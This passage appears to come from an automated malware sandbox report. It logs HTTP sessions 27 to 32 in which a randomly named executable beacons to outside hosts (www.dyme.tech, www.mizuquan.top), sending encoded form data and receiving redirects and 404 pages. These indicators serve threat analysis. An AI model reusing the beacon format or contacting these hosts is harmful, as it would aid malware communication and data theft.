                                                                                              Data Raw: 49 34 45 54 35 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 6e 4a 6c 4f 51 58 76 47 55 58 4c 77 39 50 36 6c 31 6c 31 38 56 47 5a 53 30 55 6d 33 72 78 30 45 43 7a 2b 4b 49 52 62 37 6e 36 62 65 77 69 70 71 6e 4e 6a 74 6f 61 73 77 34 4a 38 63 47 72 39 4f 67 66 56 34 78 43 2b 57 65 6c 6c 63 2b 68 54 47 46 55 47 6a 54 4d 76 4a 64 31 75 34 45 6c 47 6c 74 55 6a 53 78 69 48 76 74 45 32 32 50 62 4f 53 43 52 67 4f 73 61 31 73 63 45 31 51 2b 37 4d 39 51 71 4b 75 50 71 2b 74 35 34 70 5a 4d 4c 76 44 6f 51 2b 31 4a 2b 72 67 72 50 41 4e 4d 52 6a 4f 57 72 32 33 35 45 42 53 59 6d 53 64 58 43 6a 77 52 2b 6b 7a 2b 69 70 67 3d 3d
                                                                                              Data Ascii: I4ET5=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DManJlOQXvGUXLw9P6l1l18VGZS0Um3rx0ECz+KIRb7n6bewipqnNjtoasw4J8cGr9OgfV4xC+Wellc+hTGFUGjTMvJd1u4ElGltUjSxiHvtE22PbOSCRgOsa1scE1Q+7M9QqKuPq+t54pZMLvDoQ+1J+rgrPANMRjOWr235EBSYmSdXCjwR+kz+ipg==


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              27192.168.2.65001413.248.169.48802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:55:03.480688095 CEST1845OUTPOST /h7lb/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.dyme.tech
                                                                                              Origin: http://www.dyme.tech
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.dyme.tech/h7lb/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 76 4a 6b 39 49 58 73 6c 38 58 4b 77 39 50 6d 31 31 6b 31 38 56 2b 5a 53 4e 54 6d 33 6e 48 30 47 71 7a 38 70 41 52 4c 61 6e 36 52 65 77 69 6d 4b 6e 49 74 4e 6f 50 73 77 4a 43 38 59 69 72 39 4f 67 66 56 2b 64 43 35 45 36 6c 6e 63 2b 69 44 57 46 49 4e 44 54 6b 76 49 31 66 75 34 42 51 47 52 5a 55 6b 79 42 69 46 36 78 45 71 6d 50 5a 4e 53 44 57 67 4f 52 64 31 73 42 37 31 54 69 52 4d 2f 4d 71 4c 72 75 73 71 74 35 66 34 66 6b 74 7a 43 51 6e 2f 53 70 31 79 44 66 66 4f 73 41 65 73 64 65 66 39 43 5a 61 4d 43 4e 59 66 66 48 51 74 51 70 76 6b 77 54 59 38 42 71 35 55 69 69 45 74 33 63 78 46 4c 36 2b 77 68 64 4c 4e 58 33 7a 36 57 74 71 54 6e 32 51 30 44 73 41 6e 34 55 73 65 76 2f 7a 62 41 4e 68 64 70 6f 36 79 65 45 76 72 74 49 63 76 45 45 43 35 39 37 6c 61 46 36 6d 6e 50 50 6c 45 69 52 68 52 36 77 52 58 5a 31 33 4a 6d 6b 61 2f 49 51 65 53 70 41 45 37 47 73 2b 67 71 75 4b [TRUNCATED]
                                                                                              Data Ascii: I4ET5=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DMavJk9IXsl8XKw9Pm11k18V+ZSNTm3nH0Gqz8pARLan6RewimKnItNoPswJC8Yir9OgfV+dC5E6lnc+iDWFINDTkvI1fu4BQGRZUkyBiF6xEqmPZNSDWgORd1sB71TiRM/MqLrusqt5f4fktzCQn/Sp1yDffOsAesdef9CZaMCNYffHQtQpvkwTY8Bq5UiiEt3cxFL6+whdLNX3z6WtqTn2Q0DsAn4Usev/zbANhdpo6yeEvrtIcvEEC597laF6mnPPlEiRhR6wRXZ13Jmka/IQeSpAE7Gs+gquK9s+CZYhtfRt4IFtxwpen79o3TFVditsbsmoz4HILGC8576k2fqw2O+6Etl4cCKR2oYuRViXfCDjl8ehrd2Odt0RoizOo0eOqErIhEL2KTwUa2+y0KEjedJ3lqaA0Edo2N1omKgCSTrmU0svWThUfmmxZi3ALWxDY1x3puT+O0FYoCDEcIM834z/SZUknN+9smT7SEHLEzbavUjbawT5YYzf1+Gfc+uRVLbTglLUzDD2HSCHTVkc1Th8tPN9n+VJHVEzsdIPMS1EVjqr2udRB+GWCUgn4NwpaVF1iUrFCieQBL7cogUcFLttjW4I/w6IWLAvFI5Rs9O6P0B3go08EJpwPi3cbTeiZPhCmywmjhZnZNDylhdlWkxBPybTxOsPw6AMnencvlCFxXij3jkoWDL0S52iXfSBsfP+JYM0g2WbJs4wYQ2ZtBm9L9eILmzXjTyLiOhov8cISv8yzErc16ayZPfd3i8ToyNzVx9oj6d3AmjHsG3FPXSGpZohcPacgENJ4S9NfKRY5UE3ElYuBen3feqaeKLbOwR/+rnGgDjDFb1bIBjIbQwXeGuE+59MS3jPdhQKppNdDwmleDcb53q8BnFJV/bVuzwrdUnPuS5CebYrHBS2uWmDWyqmRpwfXyySpXWl+JzVrNq5tps6/7ezaIb0l0p68vZ [TRUNCATED]


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              28192.168.2.65001513.248.169.48802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:55:06.025427103 CEST562OUTGET /h7lb/?I4ET5=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U8wzgLDyi+d9/jciraahzpwjZL5E+FLfjf2KFU0ZNlPPutFUmc0=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.dyme.tech
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Oct 8, 2024 15:55:06.484975100 CEST414INHTTP/1.1 200 OK
                                                                                              Server: openresty
                                                                                              Date: Tue, 08 Oct 2024 13:55:06 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 274
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 34 45 54 35 3d 52 62 50 48 61 4f 52 75 71 33 56 4c 73 49 76 42 49 65 6c 4a 35 47 4f 35 31 47 47 4d 58 56 69 74 78 55 74 43 6d 73 52 58 47 49 36 6a 79 74 59 64 33 57 56 48 41 79 67 71 73 67 39 6d 34 73 78 37 49 58 67 6c 6f 46 58 2b 38 47 2b 76 79 64 51 5a 4a 4c 50 30 55 38 77 7a 67 4c 44 79 69 2b 64 39 2f 6a 63 69 72 61 61 68 7a 70 77 6a 5a 4c 35 45 2b 46 4c 66 6a 66 32 4b 46 55 30 5a 4e 6c 50 50 75 74 46 55 6d 63 30 3d 26 35 78 6e 30 33 3d 37 76 4d 78 32 48 6c 50 57 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?I4ET5=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U8wzgLDyi+d9/jciraahzpwjZL5E+FLfjf2KFU0ZNlPPutFUmc0=&5xn03=7vMx2HlPWl"}</script></head></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              29192.168.2.65002143.242.202.169802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:55:25.977612972 CEST817OUTPOST /e0nr/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.mizuquan.top
                                                                                              Origin: http://www.mizuquan.top
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.mizuquan.top/e0nr/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 4b 74 58 63 32 31 38 6b 45 41 59 2f 54 6d 73 33 71 45 49 68 55 77 5a 77 73 7a 6b 77 72 41 6b 7a 54 5a 65 64 7a 64 50 47 56 7a 75 61 4f 37 4b 70 70 53 47 44 63 52 46 38 36 76 48 69 4a 64 42 47 63 42 32 5a 39 46 2b 45 32 38 30 63 34 53 46 34 4c 30 61 33 55 4e 69 51 52 43 47 50 2f 61 50 33 52 48 4c 75 36 6e 73 62 58 51 39 65 65 6c 77 58 61 64 74 30 6f 4d 36 50 53 37 45 4f 4f 76 48 6d 45 50 47 2f 55 57 53 4b 69 2b 6d 45 4e 56 41 79 6f 51 6f 50 65 68 41 49 34 62 4f 63 48 39 47 67 4d 43 53 74 53 31 46 59 49 77 4e 47 45 4d 45 7a 2b 4a 57 46 4d 4a 38 75 2f 31 2f 47 44 4f 2b
                                                                                              Data Ascii: I4ET5=H9Rq2Rs7eYeiaKtXc218kEAY/Tms3qEIhUwZwszkwrAkzTZedzdPGVzuaO7KppSGDcRF86vHiJdBGcB2Z9F+E280c4SF4L0a3UNiQRCGP/aP3RHLu6nsbXQ9eelwXadt0oM6PS7EOOvHmEPG/UWSKi+mENVAyoQoPehAI4bOcH9GgMCStS1FYIwNGEMEz+JWFMJ8u/1/GDO+
                                                                                              Oct 8, 2024 15:55:26.846904993 CEST691INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:55:26 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 548
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              30192.168.2.65002243.242.202.169802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:55:28.532839060 CEST841OUTPOST /e0nr/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.mizuquan.top
                                                                                              Origin: http://www.mizuquan.top
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.mizuquan.top/e0nr/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 77 6b 39 58 64 65 50 43 64 50 4c 31 7a 75 49 75 37 50 78 4a 53 64 44 63 56 6a 38 34 37 48 69 4a 5a 42 47 59 46 32 5a 4b 70 39 43 6d 38 32 61 34 53 4c 37 37 30 61 33 55 4e 69 51 51 6d 34 50 2f 69 50 33 43 50 4c 76 59 50 76 45 6e 51 2b 5a 65 6c 77 61 36 64 68 30 6f 4d 59 50 58 54 75 4f 4d 48 48 6d 45 66 47 2f 47 75 54 42 69 2b 73 4b 74 55 42 32 6f 68 50 4e 39 4e 41 58 4a 2f 36 64 57 42 51 68 36 44 49 78 68 31 6d 4b 59 51 50 47 47 55 32 7a 65 4a 38 48 4d 78 38 38 6f 35 59 4a 33 72 64 37 70 61 47 68 49 4b 37 54 79 76 78 32 4b 59 52 42 67 35 64 4c 41 3d 3d
                                                                                              Data Ascii: I4ET5=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w9wk9XdePCdPL1zuIu7PxJSdDcVj847HiJZBGYF2ZKp9Cm82a4SL770a3UNiQQm4P/iP3CPLvYPvEnQ+Zelwa6dh0oMYPXTuOMHHmEfG/GuTBi+sKtUB2ohPN9NAXJ/6dWBQh6DIxh1mKYQPGGU2zeJ8HMx88o5YJ3rd7paGhIK7Tyvx2KYRBg5dLA==
                                                                                              Oct 8, 2024 15:55:29.531091928 CEST691INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:55:29 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 548
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                              Oct 8, 2024 15:55:29.918478966 CEST691INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:55:29 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 548
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              31192.168.2.65002343.242.202.169802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:55:31.075041056 CEST1854OUTPOST /e0nr/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.mizuquan.top
                                                                                              Origin: http://www.mizuquan.top
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.mizuquan.top/e0nr/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 34 6b 39 6b 56 65 65 52 46 50 4b 31 7a 75 54 75 37 4f 78 4a 54 46 44 59 42 2f 38 34 32 38 69 4c 52 42 48 39 52 32 66 34 52 39 4d 6d 38 32 59 34 53 47 34 4c 31 43 33 55 64 75 51 52 57 34 50 2f 69 50 33 45 72 4c 70 4b 6e 76 47 6e 51 39 65 65 6c 4b 58 61 64 4e 30 6f 30 69 50 58 58 55 4f 39 6e 48 6e 6c 76 47 39 7a 43 54 64 79 2b 71 48 4e 56 53 32 6f 74 51 4e 39 51 7a 58 4a 4b 74 64 56 64 51 73 72 32 74 69 31 39 61 54 49 51 6a 56 48 55 33 30 36 6c 76 4e 2f 4e 69 7a 62 46 4d 41 32 33 57 30 4d 6e 46 73 65 4c 4d 63 41 65 51 32 4d 31 74 46 6b 78 58 64 4f 66 57 74 71 78 5a 66 75 70 57 30 42 64 67 42 64 56 6b 56 67 62 38 54 30 56 36 36 69 45 62 50 45 4f 75 65 57 6d 54 55 2f 69 44 6e 2b 74 35 34 58 4c 35 4b 4d 52 73 70 67 61 42 44 76 4c 48 46 6d 59 37 35 41 2f 32 46 58 50 50 65 65 6d 62 73 4f 47 41 59 50 6a 71 44 35 2b 43 63 44 47 63 6b 79 4d 71 6c 54 52 5a 65 6e 33 2b [TRUNCATED]
                                                                                              Data Ascii: I4ET5=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w94k9kVeeRFPK1zuTu7OxJTFDYB/8428iLRBH9R2f4R9Mm82Y4SG4L1C3UduQRW4P/iP3ErLpKnvGnQ9eelKXadN0o0iPXXUO9nHnlvG9zCTdy+qHNVS2otQN9QzXJKtdVdQsr2ti19aTIQjVHU306lvN/NizbFMA23W0MnFseLMcAeQ2M1tFkxXdOfWtqxZfupW0BdgBdVkVgb8T0V66iEbPEOueWmTU/iDn+t54XL5KMRspgaBDvLHFmY75A/2FXPPeembsOGAYPjqD5+CcDGckyMqlTRZen3+0dd2CXq/d7qJJ8XZcxcgKD5HBBIj/YM7EVbLECAPIzEzy8yQM+05SH29l+zQ4DEUa447QvpMzv9FohaGh5sfFs27UWmsuDk9ZDlHsKdneXN5jSE+xQfW3jtDhktcQaHo0MLaWwcFcQywzn34v7oLOW4vLbLwlcQrwBswQOF2aOhWpLtE4Af2belsJ4PsEi5mUsk8tt7CstYOjJtvfrAvDAD/0N5LY1BNXx6+ojhVPEFhApGs/WT+UfUudssxkifjAitg9u15xK8TpaLm1CXh8lJKduxjWYRzRDUUsenKJd1/vM72USBCtr4iFOtl3tT4/ZVWnDj+INjwXVHtrSz9py3lSOJJhtfUmGv5aSXCKhBYJewgiv6k2KVxKg/TraG5pCDbeqyyp0HB++dOlbUzn17msoDQ66CEz+Iwqr1uHGzx1BquprrVB4PU0VrVTDeP19+ijIhXl/WvFi7EReeWNea+ALdakWr4d0Y3gG220QEsfs7Ar1MdwP9vBQZudfTCXxYWPCWLoleF3qw4RjiGW0/Z0bgnnsF03ZmQeu0KXPZAO7TuotRz4aUgG51SyT2aKmTXhO38X8wt6L1gsyyi4bF5iT7PRYLALrPj6YaiQHLESCnIK7i/JujrIT3pZ/XEF927iFn/YFwlWMPE6Er/sbER+fFwLst8Na [TRUNCATED]
                                                                                              Oct 8, 2024 15:55:32.142285109 CEST691INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:55:31 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 548
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              32192.168.2.65002443.242.202.169802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:55:33.618738890 CEST565OUTGET /e0nr/?I4ET5=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txL1JCWIKw0rFG3lN0WjCCPv2jnxqsoqX4CWEeQPgrQsdkl4cxLCA=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.mizuquan.top
                                                                                              Connection: close
